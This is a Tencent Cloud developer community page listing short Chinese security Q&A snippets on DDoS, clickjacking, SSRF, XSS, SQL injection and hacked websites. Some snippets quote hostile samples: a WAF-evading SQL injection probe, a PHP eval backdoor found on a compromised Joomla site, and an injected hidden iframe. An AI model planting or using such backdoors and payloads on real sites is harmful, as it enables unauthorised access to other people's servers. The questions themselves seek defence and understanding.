腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
视频
沙龙
1
回答
用户如何在没有写权限的情况下创建文件?
、
、
我有一个带有Apache的use服务器,它为特定的vhost配置为在它的文件夹中使用特定的用户名。现在,这个用户是文件的所有者,但是在所讨论的文件夹中没有写权限,但是昨天,站点被破坏了,两个具有写权限的文件刚刚出现在文件夹中。 我的问题是:怎么做? 我知道,如果一个网站被破坏,很多事情可能会发生,但该网站仍然运行在该用户名的上下文中,它根本没有权限将任何文件写入该文件夹。还是我不正确地理解权限?
浏览 0
提问于2013-08-23
得票数 0
3
回答
如何在web服务器上通过简单的函数来阻止DDoS攻击?
、
、
、
、
我有一个预防ddos攻击的简单思路。如果我的想法是错误的,请澄清我。 选项1 从对DDOS攻击的基本理解来看,攻击者正在向web服务器发送大量数据。那么,提供大数据上传到他们网站的网站呢?难道他们不是同时从很多上传用户那里接收到了很多数据吗? web服务器不能像许多上传数据的用户一样对待ddos攻击吗? 选项2 网站报价怎么样,每个访问网站的人都要临时键吗?使用该临时密钥插入网站,唯一的一个(PC/IP)可以访问该网站,因此bot-net不能攻击该网站(bot-net没有临时密钥)。bot-net能记下密钥并插入到网站中吗? 附注: 这是类似的问题DDoS -不可能停下来?
浏览 0
提问于2015-09-04
得票数 1
回答已采纳
2
回答
在什么情况下我的网站容易被点击?
、
我读过的大多数例子都是从恶意网站开始的。让我说,我正在创建一个没有恶意意图的网站。网站什么时候变得容易被点击攻击?在没有XSS漏洞或我的服务器被破坏的情况下,这种情况会发生吗?如果是这样的话,是怎么做的?
浏览 0
提问于2019-03-12
得票数 3
回答已采纳
1
回答
怎样才能防止我的API被除我的网站之外的任何东西访问?
、
、
、
、
我有一个API (Java + Play Framework)。我有一个网站(反应),谁必须与API沟通。我不希望我的API被任何东西调用,除了我的网站。 我该怎么做?
浏览 0
提问于2018-07-08
得票数 -1
回答已采纳
2
回答
打电话或短信是如何利用智能手机的?
一个电话号码怎么能被用作访问智能手机的手段呢?我正在阅读声称,您可以收到电话或短信,攻击者可以安装他们的恶意软件的方式。这样的方法可能吗?这似乎有点过头了。在智能手机上安装恶意软件的具体方法是什么?我对信息安全有一个相当基本的理解,任何书籍或网站阅读都是非常感谢的。
浏览 0
提问于2019-09-23
得票数 3
1
回答
如何使用吊销证书,对于同一个私钥是否可以有多个吊销证书?
、
、
我刚刚为我的密钥生成了一个撤销证书。不幸的是,我没有完全理解这个概念。以下是我的问题: 我到底该怎么用呢?例如,假设我的私钥被泄露。我到底要怎么处理我的撤销证书?例如,给我所有的熟人发一封电子邮件,说:“看,私钥泄露了,这是吊销证书吗?”(为什么不只是“看,私钥泄露了”?)我是否应该在我的网站上发布撤销证书,以防私钥被泄露? 如果我在GnuPG中重新运行相同的命令,我会得到不同的吊销证书吗?还是严格依赖于私钥,这样就可以给出私钥一个和一个撤销证书吗?
浏览 0
提问于2020-12-16
得票数 1
回答已采纳
1
回答
使用MIME类型响应的SSRF开发
我的网站有一个阿凡达上传表格,你可以直接上传图像从PC或使网站抓取它从另一个主机。如果MIME类型出错,响应将包含以下内容:{"status":"wrong_mime","mime":"text\/html;}应用程序在Amazon上运行,我从对AWS的SSRF攻击上看到,如果一个易受攻击的网站返回信息,那么您可以获取有价值的信息。我的问题是,如果我的应用程序返回我的网站试图访问的文件的MIME类型,有人会利用它吗?如果是,那怎么做?
浏览 0
提问于2022-03-15
得票数 1
回答已采纳
1
回答
如何保护网站免受死亡攻击?
、
我发现了这段视频,在其中,他们说要用PoD攻击一个网站,只使用cmd。如何保护网站免受这种类型的拒绝服务(DoS)攻击? 我想这很难防范,因为任何人都可以实施这样的攻击。
浏览 0
提问于2013-03-30
得票数 3
回答已采纳
4
回答
避免由突击队自动创建流量
、
、
、
我在考虑网络安全,然后这个想法突然出现在我的脑海中。 说有个混蛋讨厌我知道怎么编程。我管理一个不错的网站/博客与相当数量的流量。然后,那个混蛋创建了一个程序,自动请求我的网站一遍又一遍。 因此,如果我是主持我的网站在共享主机提供商,那么显然我的网站将停止回应。 这种类型的攻击可能并不常见,但如果有人试图在我的网站上这样做,我必须采取一些措施。我不认为像wordpress或drupal这样流行的CMS会对这种类型的攻击做些什么。 我的假设是; 如果用户在1分钟内请求x次数超过50次(比方说50次),请阻止该用户。(停止回应) 我的问题是; 我的假设可以吗?如果不是,该怎么办呢? 像Goo
浏览 9
提问于2013-08-19
得票数 1
1
回答
用WAF过滤器对网站进行SQLi的尝试
、
、
、
、
当我发现网址中包含了id参数时,我正在对一个网站进行访问。因此,我知道id参数可能容易受到SQLi的攻击。我收到了一个200响应,在向服务器发送以下请求后,没有发现注入成功的迹象: Example.com/php?id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3, 在与这个网站和WAF斗争了大约一个小时后,我注意到该网站继续用一个200响应每一个请求。我也尝试运行sqlmap,但是WAF阻止了我的连接。 那么我怎么知道这个网站是否容易受到SQLi的攻击呢? 有谁能帮我理解一下我注射失败的原因吗?
浏览 0
提问于2018-07-19
得票数 -1
回答已采纳
1
回答
我的skype密码怎么会被偷?
、
我的skype密码最近被更改了。我把它改回来了,在黑客的网站上发现了它。我的密码是pc生成的,就像as2fZ12v一样。如果我从来没有写过,他们是怎么破解它的?
浏览 0
提问于2014-03-01
得票数 0
回答已采纳
1
回答
在XSS漏洞情况下保护Websocket连接
、
、
、
目标 通过HTTP请求验证客户端。 验证客户端的WebSocket连接。 防止利用WebSocket连接(当网站上存在XSS漏洞时)。 我是怎么做的 步骤1客户端通过发出常规HTTP请求访问网站。Cookie用于验证客户端和服务器响应的JS snippet +AuthToken(生成和保存在服务器上): (function() { var ws = new WebSocket("wss://localhost:1000"); // application logic goes here })(); 步骤2服务器将新创建的WebSocket连接标记为不安全/未知。
浏览 0
提问于2021-08-15
得票数 0
回答已采纳
1
回答
有人可以上传php文件,而不需要ftp访问我的服务器。
、
我有网站在PHP/MYSQL开发使用CakePHP框架。最近,它被黑客入侵,有人能够上传一些PHP和JS文件,网站被关闭。网站FTP,控制面板等都是安全的。所以我想知道是否有人能帮上忙,那个人怎么能做到这一点,这样我就可以把它修好了。这对我来说是非常关键的,我要尽快把它塞进去。请帮帮忙。
浏览 0
提问于2011-06-16
得票数 0
3
回答
过多的请求如何导致服务器崩溃?
、
我想知道为什么网站崩溃了。 如果服务器有太多的请求,它可能会在其等待列表中将请求排队,并在所有先前的请求都已被处理时为其服务。这意味着对该网站的请求将得到处理,尽管可能需要比预期更长的时间。 那么,网站怎么会因为服务器超载而崩溃呢?
浏览 0
提问于2010-05-11
得票数 3
回答已采纳
4
回答
用两个撇号替换所有撇号是否足以防止MSSQL上的SQL注入?
、
、
我在一个不使用SQL查询参数的网站上工作。所有的查询都是临时的,它们进行输入验证的方式对我来说似乎不错,我无法打破它来执行SQL注入。 它们正在验证数字输入,如果是字符串,则执行以下操作(例如: sanitizedInput = "'" & Replace(input, "'", "''") & "'" 在其他SGBD中,它很容易被打破,但在MSSQL中,我没有找到一种方法来实现它。我怎么能打破这个?我只想让他们知道这还不够。
浏览 0
提问于2011-09-28
得票数 3
1
回答
在网站上安全使用本地文件
、
、
我有一个网站,用户可以选择一个文件从他们的本地机器,操作它,然后保存它。 该网站完全用JavaScript编写,以确保它是纯粹的客户端。用户选择的文件内容是否完全安全(从网站本身的角度来看,我知道用户可能在他们的本地机器上有恶意代码,等等)?
浏览 0
提问于2019-09-19
得票数 1
1
回答
有趣的AMD缺陷到底有多严重?
CTS披露了AMD Ryzen架构芯片中的几个“缺陷”。这些缺陷被称为Ryzenfall,Masterkey,Fallout和Chimera (https://amdflaws.com/)。然而,一些技术站点(例如有线)和博客对缺陷的动机、发布方式和严重程度提出了疑问。在CTS网站上似乎也有一个非常奇怪的免责声明。迄今为止,在没有大量炒作的情况下,很难找到任何数据。这些缺陷有多严重,我需要做些什么来保护我的系统?
浏览 0
提问于2018-03-14
得票数 4
回答已采纳
1
回答
有东西在我的网站上生成垃圾邮件页面
、
该网站是视频-de-musica.com,这是一个简单的wordpress博客音乐视频。不知怎么的,子域stats.visual-de-musica.com充满了垃圾邮件,我记得为pwiki统计数据设置了域,但后来卸载了它,我不记得它发生了什么事。 这是一个垃圾邮件页面stats.visual-de-musica.com/aal-0exe.htm的例子。 当你在谷歌上搜索可打印超人徽章蝙蝠侠,这是第一个结果,当你访问它时,你被重定向到一个“谷歌发现恶意软件可能被安装到你的计算机上,如果你继续”诈骗网站。 我已经尝试禁用所有插件,没有任何改变。 有谁知道发生了什么以及如何去除这个吗? 我正在下载
浏览 0
提问于2011-04-24
得票数 2
回答已采纳
1
回答
带有HTTP和HTTPs页面的网站
、
我看到了一个由HTTP和HTTPs部分组成的网站。也就是说,网站(80% )是通过HTTP的,因为支付页面是通过HTTPs的。 那么这个网站会被认为是安全的吗? 它能被利用吗? 从网站的HTTP部分开发支付部分?
浏览 0
提问于2019-08-09
得票数 1
回答已采纳
1
回答
在错误报告中区分布鲁特力和爬行器
、
、
、
我最近收到了很多电子邮件,报告我的网站上的问题,当我回头看的时候,已经被报道为布鲁特部队的攻击。在对他们的位置进行进一步检查后。我注意到他们中的很多人都来自同一个IP地址,并且似乎链接到Google,或者雅虎,例如这个网站: https://www.abuseipdb.com/check/104.199.203.53 报告如下IP: 104.199.203.53,它起源于google云,作为蛮力。 有一个好的方法来区分明显的暴力攻击和爬虫检查网站吗? 更新:所有电子邮件都是从生产网站生成的。错误报告发出空引用异常。
浏览 0
提问于2017-03-01
得票数 0
回答已采纳
3
回答
这个网站怎么会被感染呢?
、
、
、
我运行一个小网站的一些Joomla 1.5版本。今天看来,它遭到了黑客攻击:index.php和index2.php文件被覆盖,管理员帐户的密码被更改,images文件夹可能包含恶意的可执行文件。 我能够用备份恢复index页面,并用另一个特权用户帐户重置管理用户。 由于我在这些问题上不是很多专家,我的问题是:这个网站怎么会被感染?例如:如何实际删除和替换某些文件,并将可执行文件存储在文件夹中。怎么会有人更改管理员密码,但其他人却不动呢? (我非常清楚安装核心版本更新的重要性-我更感兴趣的是如何执行这样的攻击。) 谢谢你有洞察力的回答。
浏览 0
提问于2010-12-09
得票数 1
回答已采纳
5
回答
linuXploit_crew击中了我的网络服务器
、
、
我们运行的是一台旧的Windows机器,运行IIS4.0时完全安装了补丁。 今天我们被"linuXploit_crew“击中了,他们把我们的网站打倒了一两分钟。(幸运的是,我们很快就注意到了网站上的一个变化,并在攻击发生后几分钟内修复了它)。 然而 查看我们的FTP日志,我们的default.asp文件中没有任何变化,而且我没有看到任何异常的Web日志。有什么好办法找出他们是怎么进来的吗?我们在Cisco防火墙上只打开了3个端口,FTP、HTTP和HTTPS (21,80,443)。
浏览 9
提问于2008-10-01
得票数 4
回答已采纳
1
回答
SSL证书对于内部网站有多重要?
、
、
我知道很多人都问过同样的问题,但我认为这真的取决于网站的类型。这就是为什么我要问关于我的网站的问题。 我正在为一家保险公司开发一个PHP网络应用程序。应用程序包含有关客户的所有信息,但该应用程序仅供公司的管理员和推销员使用。管理员创建一个用户,然后该用户可以添加客户或续保他们的保险。地址将类似于example.com/manage/,并且登录仅针对管理员创建的用户。当然,我将使用验证、salt、加密等,但是我需要SSL证书吗?
浏览 0
提问于2014-02-02
得票数 2
回答已采纳
1
回答
网站会被iframe注射黑吗?
、
、
我的网站被黑了。我正在观察黑客如何访问我的网站。虽然我一直在使用bindparam来阻止sql injection和direct access restriction为backdoor attack提供服务,但黑客改变了自己的index.php页面并运行了自己的脚本。S/他在上传的html脚本中添加了下面一行<iframe width='1' height='1' src='https://www.youtube.com/embed/hKdyS_bgUbM?rel=0&autoplay=1&loop=1&playlist=R
浏览 0
提问于2018-07-14
得票数 1
6
回答
哪些是web攻击,用户可以在您的服务器上运行代码?
我听说了一些关于不安全的web服务器和站点的故事,人们(或机器人)闯入它们并在服务器上执行自己的代码。 我的问题是这怎么可能?我听说人们把自己的javascript放在网站上,窃取饼干和技术。我从未听说过执行代码的实际攻击。我知道mysql注入可以用于窃取数据并在页面上输入javascript代码。但是我仍然很难思考一个网站的弱点如何会危害到服务器。那件事怎么可能?
浏览 0
提问于2011-11-14
得票数 10
回答已采纳
2
回答
如何在recaptcha认证后将POST数据传递到外部站点?
、
、
我有一个表单的行动是另一个网站上的脚本,我需要过滤掉垃圾邮件。我已经设置了recaptcha,并将我的表单操作更改为指向一个本地v2文件,该文件成功地接收到来自recaptcha的‘成功’或‘失败’响应。在“失败”时,我使用php头将访问者返回到他们来自的页面,但在“成功”时,我不知道下一步该怎么做。获取我的帖子数据并将其提交到外部网站的capture.php脚本的最佳方式是什么?
浏览 0
提问于2019-01-14
得票数 2
1
回答
重哈希如何影响安全强度?
、
我目前正在为我的网站保存散列密码。密码被腌制,然后使用SHA3-512进行散列。我理解SHA3-512的安全级别,就像所有的Keccak算法一样,它是容量的一半(正如这里解释的那样),所以在本例中是512位。 我的问题是,重哈希结果n次是如何影响安全性的?有什么方法可以有效地计算吗?在有人窃取数据库的场景中,密码被哈希哈希(例如,500次vs一次)会有什么区别呢? 在重新哈希这里之后,我已经看到了类似的关于熵的讨论,但是它们没有解决安全性问题。
浏览 0
提问于2020-03-30
得票数 1
回答已采纳
2
回答
如何测试我的网站是否阻止了点击?
、
、
、
我被要求检查如何防止在我们的网站上点击。 我做了一些研究,这就是我所理解的,如果我错了,请纠正我:攻击者将使用iframe将他们的网站分层在您的网站上,然后使他们的iframe透明。当用户点击我们的网站上的一个按钮,他们实际上是点击黑客网站。为了防止这种情况,请在我们的网站上禁用iframe。 我去检查了一下,但是我得到了一个错误: 无法在响应头中找到X帧选项标头。 这意味着什么?我没有把握。 我还在网上搜索,发现您需要在.htaccess中添加此代码。 <IfModule mod_headers.c> Header always append X-Frame-
浏览 4
提问于2022-02-09
得票数 2
1
回答
键上的蛮力
、
、
如果你是蛮横地强迫一把钥匙,尝试数以万亿计的组合,你怎么知道你什么时候不小心碰到了正确的答案?显然,你不能看每一个解码的答案,看哪一个“看起来对”。
浏览 0
提问于2015-06-03
得票数 1
回答已采纳
1
回答
windows Server被SOG入侵了,有谁能帮我?
可能重复: 我的服务器被黑客入侵 我的服务器是IIS,IIS-7,它是一个网站托管服务器&我的网站被人黑了。 它是被来自巴基斯坦组织的SOG神的士兵黑的,请帮我解决这个问题。 我怎么才能停止攻击这些组织。
浏览 0
提问于2012-05-29
得票数 -4
1
回答
改变IP源以减轻DDOS的最佳方法
、
、
源ip地址可以被欺骗。而且,由于IPv6的存在,仅保留一个被排除在访问网站之外的ip地址的查找表是不够的,因为使用ipv6,现在有足够的ip地址供单个发件人在send服务器上发送探测请求的五分位数。 考虑到这一点,哪些新的方法可以缓解web服务器的IP转发DDOS探测? 是白名单个人注册用户ip地址和____的唯一解决方案吗?
浏览 0
提问于2021-03-02
得票数 1
1
回答
最近被泄露,想知道这个网站能做些什么?
、
我最近收到了“卫报”的通知,我的一些信息被泄露给了“Combolist”,当我点击这个链接时,我就被带到了这个链接上。https://cracked.io/Forum-Combolists--297?page=2。 我对我所看到的感到非常震惊,但我并没有完全理解。我想知道这到底有多危险。据我所知,这是一个收集被盗的电子邮件,密码,用户名等,我不想互动w/任何人从这个网站,因为我有理由害怕被一个疯狂的人寻找。 这些网站是如何容易获得的? 既然很容易找到,为什么不停止呢? 我明白当一个人倒下,另一个人上升,但我想我怎么才能更恰当地保护自己呢?
浏览 0
提问于2023-02-13
得票数 1
1
回答
如何“传递”一次点击攻击?
黑客怎么能提供点击攻击呢? 黑客是否需要操纵"good.com“网站并更改其原始代码? 黑客是否创建了一个"evil.com“网站,并在"good.com”网站上放置了一个带有恶意代码的透明层? 黑客会改变客户端的代码吗?
浏览 0
提问于2016-02-22
得票数 5
回答已采纳
3
回答
我被攻击了PHP/脚本注入-虚拟问题
、
我的网站被攻击是为了钓鱼的目的。这是一个复杂的网站,但我只使用post和PHP文件。 他们怎么能攻击我?我只使用$_POST,因此我相信没有任何SQL命令和参数是可见的。没有任何框架,只有我在网站上的代码列表和访问。。 如有任何暗示/建议,将不胜感激。 对不起,如果我没有回答,但我是处理我的供应商谁封锁了整个网站。 这是他们的回答(欢迎对此作出任何评论): 因为脚本注入攻击站点代码本身,所以它能够完全避免the服务器的安全性。不幸的是,一些内容管理系统(特别是较旧版本的Joomla)极易受到这种形式的攻击。 删除攻击者使用此方法的能力的一个简单方法是在网站的顶层添加一个php.ini文件,其中
浏览 8
提问于2011-09-12
得票数 1
回答已采纳
1
回答
PHPSESSID欺骗
、
、
好的,我知道,通过猜测成功地欺骗PHPSESSID并不是一个可能的攻击矢量,即使是一个非常繁忙的网站。 但是,我想知道PHP是否有任何措施通过识别不存在PHPSESSID的请求来阻止蛮力猜测。 如果没有,是否有任何PHP函数可用于识别由于PHPSESSID错误而被拒绝的会话启动? 或者这些攻击是如此的不可能,以至于没有必要采取这样的措施?
浏览 1
提问于2019-01-10
得票数 1
1
回答
非安全的或非HTTP的cookie如何影响HSTS网站的安全性?
、
、
、
如果一个网站在HSTS上运行,并且设置了大约20个cookie。在这20个cookie中,15个是安全的,HTTP是唯一的,其余的5个都不安全。在这种情况下,我们可以以何种方式损害网站的安全?
浏览 0
提问于2014-09-30
得票数 2
回答已采纳
1
回答
检索Wikipedia搜索远程用户
、
我希望能够从wikipedia.org页面的浏览器中检索用户的搜索。 我知道它的存在是因为一个神奇的应用程序(可以从苹果商店获得)可以做到这一点。 怎么做? 这里是我对应用程序的了解: 用户转到应用程序发行者的网站。然后 单击触发PHP脚本的链接。 在PHP脚本的末尾,因特网用户被重定向到wikipedia.org页面。 此时,互联网用户所做的任何搜索都将被发送到应用程序的发布者的网站(因此在应用程序本身的后面可见) 这里有一个小图来说明我的观点: 怎么做?我们应该通过指示HTTP_REFERER来调用维基百科API吗? 谢谢你的帮忙
浏览 4
提问于2020-09-28
得票数 0
1
回答
如何利用众所周知的jquery版本?
、
我不停地搜索了很多时间,试图看看众所周知的“脆弱版本的库jquery”是如何被利用来向网站所有者证明概念的。 假设我们有一个已知安全问题的库jquery版本2.1.1。 如果你在互联网上搜索它,你会发现它很容易受到XSS和另一次攻击.但我哪里都找不到如何利用xss或者任何已知的问题..。我想自己测试一下。 编辑:我要找什么?我要在哪里测试?
浏览 0
提问于2019-04-27
得票数 2
回答已采纳
3
回答
有没有办法阻止DDOS攻击?
、
和其他许多网站管理员一样,我也面临DDOS攻击的问题。我已经尝试过拒绝从htaccess文件中侵犯IP地址,并使用更大更好的主机,但由于使用了新的IP地址,我无法阻止攻击。
浏览 0
提问于2016-02-25
得票数 10
1
回答
Laravel5.1+ CSRF保护-足够安全吗?
、
、
、
、
我在我的网站上默认使用csrf保护。网站上有一些表单,允许用户将数据发送到DB (如评论)。 正如你所知道的- csrf保护足以防止攻击和注射?
浏览 3
提问于2016-01-15
得票数 0
回答已采纳
2
回答
Joomla 2.5的黑客攻击
、
我有一个客户,他的Joomla网站被黑客入侵,我不太清楚这是怎么发生的,但我可以看到,有许多脚本发送垃圾邮件,在搜索包含单词eval的文件时(我发现了61个匹配的文件,如下所示: <?php $lbdw = "495c05e857e328e1e65ca6b0bc03dc88"; if (isset($_REQUEST['tlhqdsj'])) { $mglvq = $_REQUEST['tlhqdsj']; eval($mglvq); exit(); } if (isset($_REQUEST['o
浏览 1
提问于2013-10-31
得票数 1
回答已采纳
2
回答
服务器被DD攻击怎么办?
、
服务器被DD攻击怎么办
浏览 729
提问于2020-06-19
1
回答
红宝石的弱点对我有什么影响?
访问本网站:http://ruby-doc.org/ 我收到这样的信息: 在过去的14天里,有3份Ruby漏洞报告。2高,1中等。最近: CVE-2013-4562。详情见。 我安装红宝石只是为了好玩和玩它。这个弱点会影响我吗?我真的很害怕我该怎么办?
浏览 0
提问于2014-05-17
得票数 1
回答已采纳
2
回答
当JavaScript被禁用或不可用时,阻止使用AJAX提交的表单提交
、
、
、
、
我在我的网站上有相当多的表单是使用jQuery ajax提交的。当我最近禁用了JavaScript来做一些测试时,我注意到这些表单以通常的方式提交。 当javascript不可用或禁用时,有没有什么方法可以防止它们被提交呢? 我的表单没有method或action。这些都是在ajax本身中指定的。我使用button而不是 我能做些什么来阻止他们被提交吗? 我知道我可以在页面加载后生成/启用按钮和内容,但如果用户在页面加载后故意禁用JavaScript怎么办?
浏览 1
提问于2014-07-21
得票数 0
1
回答
输出用户输入-防止xss
、
、
我有一个在我的网站上可以存储项目的管理部分。一旦它们被存储,它们就会显示在前端。我的显示的一部分涉及如下代码: echo "<p>".$rose['description']."</p>"; 是否需要在其中包含htmlspecialchars以在较低级别上保护xss?
浏览 1
提问于2012-04-13
得票数 0
回答已采纳
1
回答
yii1防止sql注入
、
我使用的方法是: $model->POST=$_POST‘’Booking‘; 将所有post数据加载到模型中并使用模型进行查询 Abc::model()->findByAttributes(array('id'=>$model->abc_id)); 我想防止我的网站SQL注入。 我该怎么做?
浏览 1
提问于2017-06-22
得票数 0
回答已采纳
2
回答
理解基于岗位的XSS
、
、
我一直在努力学习XSS,更具体地说,基于POST的XSS。但我不确定我是否真正理解基于POST的XSS是如何工作的。 使用GET,您可以使用URL参数来执行XSS,但是要利用基于POST的XSS,您需要使用HTML表单(它可以伪装成链接标记或其他任何形式,但最终,它是HTML表单),或者在您自己的网站上,或者在允许创建HTML表单的其他网站上,然后在HTML表单输入中硬编码可利用的参数。 当有人登陆你的网站时,你可以自动提交表单,或者用户自己可以点击某个按钮,也许有上百万种不同的方式。 总之,HTML表单部分是主(仅?)怎么做? 谢谢! UPDATE:还有javascript fetch方法也
浏览 0
提问于2019-08-13
得票数 3
回答已采纳
2
回答
google chrome将您的站点视为恶意软件
、
、
、
我刚刚发现我的一个网站被Chrome认为是恶意软件。 以下是谷歌Chrome展示的内容: ___网站包含来自网站___的元素,该网站似乎承载恶意软件--可能会伤害您的计算机或未经您的同意而操作的软件。只要访问一个包含恶意软件的站点,就会感染您的计算机。 我的网站使用Joomla 1.5作为CMS,并发行证券,其中一个模板("beez“,我认为是模板的名称)与Joomla包含了一种病毒,现在我更新了Joomla并删除了模板,并且我认为解决了这个问题。 现在Chrome仍然认为我的网站是恶意软件。我有什么办法解决这个问题吗? 谢谢!
浏览 7
提问于2009-10-10
得票数 0
回答已采纳
1
回答
同时在多个客户站点使用移动OTP进行多次登录尝试
、
、
我们有多个客户网站,提供登录通过移动号码OTP选项(新的和注册的用户)。最近,我们遇到一个事件,一个用户在几分钟内收到了100+ OTP,可以多次登录10+不同的网站。尝试在少数不熟悉的网站上也是如此。 这是哪种攻击?那怎么可能呢? 如何理解这些OTP是否用于登录和收集信息?或者只是为了制造网络恐惧?(并不是所有的客户站点都像社交网站一样提供新的设备登录通知) 我们怎样才能防止这种情况发生?(对网站和移动电话没有任何限制,不能保密)
浏览 0
提问于2021-03-15
得票数 2
4
回答
为什么妥协的网站经常带你通过多个URL重定向?
引用自我的课程讲师的演讲: 以下是典型网络攻击的阶段:受害者访问已被破坏的合法网站。受影响的网站将受害者重定向到正在运行由攻击者控制的恶意代码的另一个网站。重定向可以首先通过各种中间服务器。 我也面临着同样的问题。如果我访问洪流网站,并错误地或有意地点击一些链接,它带我到另一个网站通过各种中介网站。为什么它会在几秒钟内通过许多站点而不是直接进入最后一个站点?对攻击者有什么好处?
浏览 0
提问于2018-02-09
得票数 27
回答已采纳
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
怎么处理网站服务器被攻击?
数据湾:网站被攻击了怎么办?
服务器被挖矿木马攻击该怎么处理
网站被降权怎么办?网站降权如何处理
网站被恶意攻击?安全狗教您怎么办
热门
标签
更多标签
云服务器
ICP备案
实时音视频
对象存储
云直播
活动推荐
运营活动
广告
关闭
领券